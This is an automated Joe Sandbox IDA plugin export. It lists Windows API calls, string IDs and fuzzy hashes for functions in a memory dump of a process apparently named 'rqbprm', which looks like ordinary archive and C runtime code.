                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
                                                                                              • Instruction ID: ea37bbc06fac6e0867a3c35c80a8b12ec9ff6fc2fbc6d29f53953bd9512a2dda
                                                                                              • Opcode Fuzzy Hash: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
                                                                                              • Instruction Fuzzy Hash: F9312975D05219DBDB21DFA4D9897CDBBF8AF08304F1080AAE50CAB290EB719B859F45
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00C7E5E8,0000001C,00C7E7DD,00000000,?,?,?,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6B4
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
                                                                                              • Instruction ID: e5063138db3a2787cbf4acaaa5d0a43b7b01d6d00c9c196f46162d1d975edec2
                                                                                              • Opcode Fuzzy Hash: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
                                                                                              • Instruction Fuzzy Hash: 2401A7736001096BDB14DE29DC49BDD7BAAAFC8328F0CC165ED6DD7164D734DA058690
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C88FB5
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C88FBF
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C88FCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: e7ab1f4c28ce566182bfea6e7b2bcebb3ec55340aaf1b44593edc159e91fb0e0
                                                                                              • Instruction ID: 5f1ebbbd30731803b6cf1590a4411687ee2a83839e759386fd2521fef63c41fb
                                                                                              • Opcode Fuzzy Hash: e7ab1f4c28ce566182bfea6e7b2bcebb3ec55340aaf1b44593edc159e91fb0e0
                                                                                              • Instruction Fuzzy Hash: B031D67590122CABCB21DF68DC89B9DBBB8BF08310F5041EAE41CA7250EB709F858F54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: eadc2dafb0cea6e4c31d9077ed8f7ee4cba64e3ee618724163f370e2be1bfb61
                                                                                              • Instruction ID: 42130e66d8e142a58cef419672cdd6bf0374b7666e4c524589558b45206b8fff
                                                                                              • Opcode Fuzzy Hash: eadc2dafb0cea6e4c31d9077ed8f7ee4cba64e3ee618724163f370e2be1bfb61
                                                                                              • Instruction Fuzzy Hash: 5B31E771900249AFCB24AE78CC85EFF7BBDDB85318F1441A8F929D7252EB309E458B54
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9E72C,?,?), ref: 00C7AF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
                                                                                              • Instruction ID: e4c76a4f5647b3f0555573636fe7a96975df89a94068fa562e0df70ad740c618
                                                                                              • Opcode Fuzzy Hash: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
                                                                                              • Instruction Fuzzy Hash: AD01217A200348AADB10DFA4EC49F9E77BCEF59710F009426FA0597261D3709955CBA5
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00C66DDF,00000000,00000400), ref: 00C66C74
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00C66C95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
                                                                                              • Instruction ID: b2ad58586fb15e3290469de67704853acb2dd7abc8400f4f46e6e829af1348d0
                                                                                              • Opcode Fuzzy Hash: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
                                                                                              • Instruction Fuzzy Hash: ADD0C931344300FFFA210B628D4AF2E7B99BF45B91F18D405B795E80E0CB789924E629
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C7F66A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
                                                                                              • Instruction ID: 1fed3fc5efcfdff06eb4ec96c727ea89e414c3b8cae6cabb949b71f1556d9b63
                                                                                              • Opcode Fuzzy Hash: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
                                                                                              • Instruction Fuzzy Hash: DC518DB19006198FDB29CF99E8C57AEB7F0FB48354F24C42AC819EB291D3749E01CB50
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
                                                                                              • Instruction ID: fb95b9d9cfc655a2c18b2589f361ac6977d767a8c1787bc5b97ed20868afaf96
                                                                                              • Opcode Fuzzy Hash: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
                                                                                              • Instruction Fuzzy Hash: 7DF017B5E002589FDB28CB18EC967DE77F1EB9A719F144296D91593390C3B0AEC08E60
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00C7F3A5), ref: 00C7F9DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
                                                                                              • Instruction ID: e3a645b8e1260b9208dee41286a75b1fd046cc77361ce5598377c2ba48c0425a
                                                                                              • Opcode Fuzzy Hash: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
                                                                                              • Instruction Fuzzy Hash:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
                                                                                              • Instruction ID: 8e793f1571395e4a5cb43dbc64baa92e9d50b38c525bc5646f6a352d73a7ce0b
                                                                                              • Opcode Fuzzy Hash: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
                                                                                              • Instruction Fuzzy Hash: 5DA001706022419B97448F35AE4DB4D3AA9AA55691709406BA509C5170EB6489A0AA11
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C6E30E
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CA1030,00000200,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4
                                                                                              • _strlen.LIBCMT ref: 00C6E32F
                                                                                              • SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00C6E3C9
                                                                                              • GetClientRect.USER32(?,?), ref: 00C6E3D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C6E475
                                                                                              • GetWindowRect.USER32(?,?), ref: 00C6E4A2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C6E4DB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00C6E4E3
                                                                                              • GetWindow.USER32(?,00000005), ref: 00C6E4EE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00C6E51B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00C6E58D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 3b18306f22232d81d7aa8d417bfdff66d6c00e861991658954945693f5e0ee04
                                                                                              • Instruction ID: b0f88ac38542fb171388f8b74ef0fecb72e6df3fb18c6fd7b85eb6f67f697e25
                                                                                              • Opcode Fuzzy Hash: 3b18306f22232d81d7aa8d417bfdff66d6c00e861991658954945693f5e0ee04
                                                                                              • Instruction Fuzzy Hash: EC81A072208341AFD720DFA8DC89F6FBBE9EB88704F04492DFA9597250D630E9058B52
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00C8CB66
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C71E
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C730
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C742
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C754
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C766
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C778
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C78A
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C79C
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7AE
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7C0
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7D2
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7E4
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7F6
                                                                                              • _free.LIBCMT ref: 00C8CB5B
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8CB7D
                                                                                              • _free.LIBCMT ref: 00C8CB92
                                                                                              • _free.LIBCMT ref: 00C8CB9D
                                                                                              • _free.LIBCMT ref: 00C8CBBF
                                                                                              • _free.LIBCMT ref: 00C8CBD2
                                                                                              • _free.LIBCMT ref: 00C8CBE0
                                                                                              • _free.LIBCMT ref: 00C8CBEB
                                                                                              • _free.LIBCMT ref: 00C8CC23
                                                                                              • _free.LIBCMT ref: 00C8CC2A
                                                                                              • _free.LIBCMT ref: 00C8CC47
                                                                                              • _free.LIBCMT ref: 00C8CC5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
                                                                                              • Instruction ID: e4e69ecf3299a9c23adf1e668390784d59bed757d2ea47ca20d2239ac73b9ef5
                                                                                              • Opcode Fuzzy Hash: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
                                                                                              • Instruction Fuzzy Hash: 61316F316007069FEB20BA38D886B6A77E9FF10318F51442AE168D7692DF31ED45DB28
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C79736
                                                                                              • _wcslen.LIBCMT ref: 00C797D6
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00C797E5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00C79806
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C7982D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                               • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1777411235-4209811716
                                                                                              • Opcode ID: 3236b5a2b343bd75322f1171407933ffdedddb980e504a27162021979810a394
                                                                                              • Instruction ID: f747b29f675bdb2fc91974b908e12edcd8d01c688072aa163e9b8ec499e36c36
                                                                                              • Opcode Fuzzy Hash: 3236b5a2b343bd75322f1171407933ffdedddb980e504a27162021979810a394
                                                                                              • Instruction Fuzzy Hash: 3E3146321083517BEB29BB649C0AF6F77ACEF42714F14411EF515961D2EB70DA0583AA
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00C7D6C1
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00C7D6ED
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7D709
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C7D720
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7D734
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C7D75D
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7D764
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00C7D76D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
                                                                                              • Instruction ID: cbdda10dc1f71700df7a2a38e4183d45739fbe0da16a32bec32b7ffd8f4833eb
                                                                                              • Opcode Fuzzy Hash: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
                                                                                              • Instruction Fuzzy Hash: 4F1133731007507FE7217BB0EC4AFAF766CAF44741F00C121FA6AA60D5DB648B0552B6
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C89705
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C89711
                                                                                              • _free.LIBCMT ref: 00C8971C
                                                                                              • _free.LIBCMT ref: 00C89727
                                                                                              • _free.LIBCMT ref: 00C89732
                                                                                              • _free.LIBCMT ref: 00C8973D
                                                                                              • _free.LIBCMT ref: 00C89748
                                                                                              • _free.LIBCMT ref: 00C89753
                                                                                              • _free.LIBCMT ref: 00C8975E
                                                                                              • _free.LIBCMT ref: 00C8976C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
                                                                                              • Instruction ID: f826fc38464521f8c8b0ef3134ef16127ceaf55298ba7f257352c515771fa5ea
                                                                                              • Opcode Fuzzy Hash: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
                                                                                              • Instruction Fuzzy Hash: 2B11B97511010ABFCB01FF54C942CDD3BB6EF14354B9255A2FA084F662DE31DE55AB88
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
                                                                                              • Instruction ID: 86c9dffc08ad6ee9cd72672f9ee8500680c59715d8ae11ec09520f6ecb1033b1
                                                                                              • Opcode Fuzzy Hash: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
                                                                                              • Instruction Fuzzy Hash: 4BB19B31800259EFCF29FFA4C8889AEBBB5BF04B18F14515AF8116B212D731DB51DB99
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C66FAA
                                                                                              • _wcslen.LIBCMT ref: 00C67013
                                                                                              • _wcslen.LIBCMT ref: 00C67084
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3122303884-3508440684
                                                                                              • Opcode ID: 5213c64c94bfe0a1aa8d504b00120319dead7d3ae6e1b4c1e9a0c51b782d71a1
                                                                                              • Instruction ID: ece9460c58016f4f291399e50810e15317ad6d6124b2728cbc7e9e6387ab536c
                                                                                              • Opcode Fuzzy Hash: 5213c64c94bfe0a1aa8d504b00120319dead7d3ae6e1b4c1e9a0c51b782d71a1
                                                                                              • Instruction Fuzzy Hash: E04106B1D08384BAEF30A7709CC6FEE776C9F05308F044956FA59A6182D774AB449B25
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B610
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7B637
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C7B650
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C7B661
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00C7B66A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C7B67E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C7B694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: d3be67535659c144b5761228b3760ab1512282124ecb7095f510bed83a3aabf9
                                                                                              • Instruction ID: c1e7b60820769527246a50bbebf5d40d8ff0ac97a44c635f4c6c4a7bc2236662
                                                                                              • Opcode Fuzzy Hash: d3be67535659c144b5761228b3760ab1512282124ecb7095f510bed83a3aabf9
                                                                                              • Instruction Fuzzy Hash: 1A21D332204245BBD6255B66FD4AF7F3B7CEB4AB85F05C018F709921A0CB529E019635
                                                                                              APIs
